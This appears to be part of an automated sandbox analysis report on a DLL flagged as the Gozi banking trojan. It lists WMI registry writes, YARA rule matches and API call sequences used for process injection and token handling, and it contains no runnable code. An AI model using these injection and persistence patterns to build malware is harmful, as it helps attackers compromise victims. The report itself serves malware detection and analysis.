Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: 61b85f75e6a7c.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E3373 0_2_013E3373
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E294D 0_2_013E294D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EB084 0_2_013EB084
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010298C2 0_2_010298C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010460F4 0_2_010460F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01035B0C 0_2_01035B0C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010353A6 0_2_010353A6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01027A06 0_2_01027A06
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010492C4 0_2_010492C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010262CD 0_2_010262CD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01021D4F 0_2_01021D4F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01034F12 0_2_01034F12
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102366D 0_2_0102366D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01031690 0_2_01031690
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0DF9 0_2_013A0DF9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0DF7 0_2_013A0DF7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DB084 3_2_049DB084
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D294D 3_2_049D294D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D3373 3_2_049D3373
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0DF9 3_2_030E0DF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0DF7 3_2_030E0DF7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C1D4F 3_2_053C1D4F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D4F12 3_2_053D4F12
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C366D 3_2_053C366D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D1690 3_2_053D1690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E60F4 3_2_053E60F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C98C2 3_2_053C98C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D5B0C 3_2_053D5B0C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D53A6 3_2_053D53A6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C7A06 3_2_053C7A06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C62CD 3_2_053C62CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E92C4 3_2_053E92C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0DF9 4_2_006D0DF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0DF7 4_2_006D0DF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA1D4F 4_2_04AA1D4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB1690 4_2_04AB1690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA366D 4_2_04AA366D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB4F12 4_2_04AB4F12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC60F4 4_2_04AC60F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA98C2 4_2_04AA98C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA62CD 4_2_04AA62CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC92C4 4_2_04AC92C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA7A06 4_2_04AA7A06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB53A6 4_2_04AB53A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB5B0C 4_2_04AB5B0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B9B084 5_2_02B9B084
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B93373 5_2_02B93373
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B9294D 5_2_02B9294D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0DF9 5_2_02BF0DF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0DF7 5_2_02BF0DF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C21D4F 5_2_04C21D4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C31690 5_2_04C31690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2366D 5_2_04C2366D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C34F12 5_2_04C34F12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C298C2 5_2_04C298C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C460F4 5_2_04C460F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C492C4 5_2_04C492C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C262CD 5_2_04C262CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C27A06 5_2_04C27A06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C353A6 5_2_04C353A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C35B0C 5_2_04C35B0C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2F83C 42_2_00E2F83C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3A2AC 42_2_00E3A2AC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E29CD4 42_2_00E29CD4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E258F8 42_2_00E258F8
Source: C:\Windows\System32\control.exe Code function: 42_2_00E268CC 42_2_00E268CC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3C094 42_2_00E3C094
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2F074 42_2_00E2F074
Source: C:\Windows\System32\control.exe Code function: 42_2_00E32844 42_2_00E32844
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1C85C 42_2_00E1C85C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1E028 42_2_00E1E028
Source: C:\Windows\System32\control.exe Code function: 42_2_00E26028 42_2_00E26028
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2D9D4 42_2_00E2D9D4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3B984 42_2_00E3B984
Source: C:\Windows\System32\control.exe Code function: 42_2_00E37160 42_2_00E37160
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2A120 42_2_00E2A120
Source: C:\Windows\System32\control.exe Code function: 42_2_00E23A7C 42_2_00E23A7C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E20210 42_2_00E20210
Source: C:\Windows\System32\control.exe Code function: 42_2_00E193D0 42_2_00E193D0
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3CB9C 42_2_00E3CB9C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E21B60 42_2_00E21B60
Source: C:\Windows\System32\control.exe Code function: 42_2_00E11B44 42_2_00E11B44
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3EB2C 42_2_00E3EB2C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1C30C 42_2_00E1C30C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E38CE4 42_2_00E38CE4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E134F4 42_2_00E134F4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2DCBC 42_2_00E2DCBC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E24C84 42_2_00E24C84
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2B408 42_2_00E2B408
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1C5EC 42_2_00E1C5EC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E335C4 42_2_00E335C4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E24D80 42_2_00E24D80
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3159C 42_2_00E3159C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E35D64 42_2_00E35D64
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2457C 42_2_00E2457C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3FEE8 42_2_00E3FEE8
Source: C:\Windows\System32\control.exe Code function: 42_2_00E296D0 42_2_00E296D0
Source: C:\Windows\System32\control.exe Code function: 42_2_00E236D4 42_2_00E236D4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2A6A4 42_2_00E2A6A4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E13EB8 42_2_00E13EB8
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1B60C 42_2_00E1B60C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1BE10 42_2_00E1BE10
Source: C:\Windows\System32\control.exe Code function: 42_2_00E40F98 42_2_00E40F98
Source: C:\Windows\System32\control.exe Code function: 42_2_00E37F9C 42_2_00E37F9C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1F83C 43_2_00E1F83C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2A2AC 43_2_00E2A2AC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E19CD4 43_2_00E19CD4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E158F8 43_2_00E158F8
Source: C:\Windows\System32\control.exe Code function: 43_2_00E168CC 43_2_00E168CC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2C094 43_2_00E2C094
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1F074 43_2_00E1F074
Source: C:\Windows\System32\control.exe Code function: 43_2_00E22844 43_2_00E22844
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0C85C 43_2_00E0C85C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0E028 43_2_00E0E028
Source: C:\Windows\System32\control.exe Code function: 43_2_00E16028 43_2_00E16028
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1D9D4 43_2_00E1D9D4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2B984 43_2_00E2B984
Source: C:\Windows\System32\control.exe Code function: 43_2_00E27160 43_2_00E27160
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1A120 43_2_00E1A120
Source: C:\Windows\System32\control.exe Code function: 43_2_00E13A7C 43_2_00E13A7C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E10210 43_2_00E10210
Source: C:\Windows\System32\control.exe Code function: 43_2_00E093D0 43_2_00E093D0
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2CB9C 43_2_00E2CB9C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E11B60 43_2_00E11B60
Source: C:\Windows\System32\control.exe Code function: 43_2_00E01B44 43_2_00E01B44
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2EB2C 43_2_00E2EB2C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0C30C 43_2_00E0C30C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E28CE4 43_2_00E28CE4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E034F4 43_2_00E034F4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1DCBC 43_2_00E1DCBC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E14C84 43_2_00E14C84
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1B408 43_2_00E1B408
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0C5EC 43_2_00E0C5EC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E235C4 43_2_00E235C4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E14D80 43_2_00E14D80
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2159C 43_2_00E2159C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E25D64 43_2_00E25D64
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1457C 43_2_00E1457C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2FEE8 43_2_00E2FEE8
Source: C:\Windows\System32\control.exe Code function: 43_2_00E196D0 43_2_00E196D0
Source: C:\Windows\System32\control.exe Code function: 43_2_00E136D4 43_2_00E136D4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1A6A4 43_2_00E1A6A4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E03EB8 43_2_00E03EB8
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0B60C 43_2_00E0B60C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0BE10 43_2_00E0BE10
Source: C:\Windows\System32\control.exe Code function: 43_2_00E30F98 43_2_00E30F98
Source: C:\Windows\System32\control.exe Code function: 43_2_00E27F9C 43_2_00E27F9C
Source: C:\Windows\System32\control.exe Code function: 45_2_0083F83C 45_2_0083F83C
Source: C:\Windows\System32\control.exe Code function: 45_2_0084A2AC 45_2_0084A2AC
Source: C:\Windows\System32\control.exe Code function: 45_2_00839CD4 45_2_00839CD4
Source: C:\Windows\System32\control.exe Code function: 45_2_0084C094 45_2_0084C094
Source: C:\Windows\System32\control.exe Code function: 45_2_008368CC 45_2_008368CC
Source: C:\Windows\System32\control.exe Code function: 45_2_008358F8 45_2_008358F8
Source: C:\Windows\System32\control.exe Code function: 45_2_0082E028 45_2_0082E028
Source: C:\Windows\System32\control.exe Code function: 45_2_00836028 45_2_00836028
Source: C:\Windows\System32\control.exe Code function: 45_2_00842844 45_2_00842844
Source: C:\Windows\System32\control.exe Code function: 45_2_0082C85C 45_2_0082C85C
Source: C:\Windows\System32\control.exe Code function: 45_2_0083F074 45_2_0083F074
Source: C:\Windows\System32\control.exe Code function: 45_2_0084B984 45_2_0084B984
Source: C:\Windows\System32\control.exe Code function: 45_2_0083D9D4 45_2_0083D9D4
Source: C:\Windows\System32\control.exe Code function: 45_2_0083A120 45_2_0083A120
Source: C:\Windows\System32\control.exe Code function: 45_2_00847160 45_2_00847160
Source: C:\Windows\System32\control.exe Code function: 45_2_00830210 45_2_00830210
Source: C:\Windows\System32\control.exe Code function: 45_2_00833A7C 45_2_00833A7C
Source: C:\Windows\System32\control.exe Code function: 45_2_0084CB9C 45_2_0084CB9C
Source: C:\Windows\System32\control.exe Code function: 45_2_008293D0 45_2_008293D0
Source: C:\Windows\System32\control.exe Code function: 45_2_0082C30C 45_2_0082C30C
Source: C:\Windows\System32\control.exe Code function: 45_2_0084EB2C 45_2_0084EB2C
Source: C:\Windows\System32\control.exe Code function: 45_2_00821B44 45_2_00821B44
Source: C:\Windows\System32\control.exe Code function: 45_2_00831B60 45_2_00831B60
Source: C:\Windows\System32\control.exe Code function: 45_2_00834C84 45_2_00834C84
Source: C:\Windows\System32\control.exe Code function: 45_2_0083DCBC 45_2_0083DCBC
Source: C:\Windows\System32\control.exe Code function: 45_2_00848CE4 45_2_00848CE4
Source: C:\Windows\System32\control.exe Code function: 45_2_008234F4 45_2_008234F4
Source: C:\Windows\System32\control.exe Code function: 45_2_0083B408 45_2_0083B408
Source: C:\Windows\System32\control.exe Code function: 45_2_00834D80 45_2_00834D80
Source: C:\Windows\System32\control.exe Code function: 45_2_0084159C 45_2_0084159C
Source: C:\Windows\System32\control.exe Code function: 45_2_008435C4 45_2_008435C4
Source: C:\Windows\System32\control.exe Code function: 45_2_0082C5EC 45_2_0082C5EC
Source: C:\Windows\System32\control.exe Code function: 45_2_00845D64 45_2_00845D64
Source: C:\Windows\System32\control.exe Code function: 45_2_0083457C 45_2_0083457C
Source: C:\Windows\System32\control.exe Code function: 45_2_0083A6A4 45_2_0083A6A4
Source: C:\Windows\System32\control.exe Code function: 45_2_00823EB8 45_2_00823EB8
Source: C:\Windows\System32\control.exe Code function: 45_2_008396D0 45_2_008396D0
Source: C:\Windows\System32\control.exe Code function: 45_2_008336D4 45_2_008336D4
Source: C:\Windows\System32\control.exe Code function: 45_2_0084FEE8 45_2_0084FEE8
Source: C:\Windows\System32\control.exe Code function: 45_2_0082B60C 45_2_0082B60C
Source: C:\Windows\System32\control.exe Code function: 45_2_0082BE10 45_2_0082BE10
Source: C:\Windows\System32\control.exe Code function: 45_2_00847F9C 45_2_00847F9C
Source: C:\Windows\System32\control.exe Code function: 45_2_00850F98 45_2_00850F98
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01038A31 CreateProcessAsUserW, 0_2_01038A31
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E7562 GetProcAddress,NtCreateSection,memset, 0_2_013E7562
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E65B4 NtMapViewOfSection, 0_2_013E65B4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_013E6C06
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EB2A9 NtQueryVirtualMemory, 0_2_013EB2A9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_010309CA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0103D9F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0102B0A5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_0103C51B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 0_2_0102D551
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01044582 NtQueryInformationProcess, 0_2_01044582
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01024D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_01024D95
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_010467CD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01044FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01044FEA
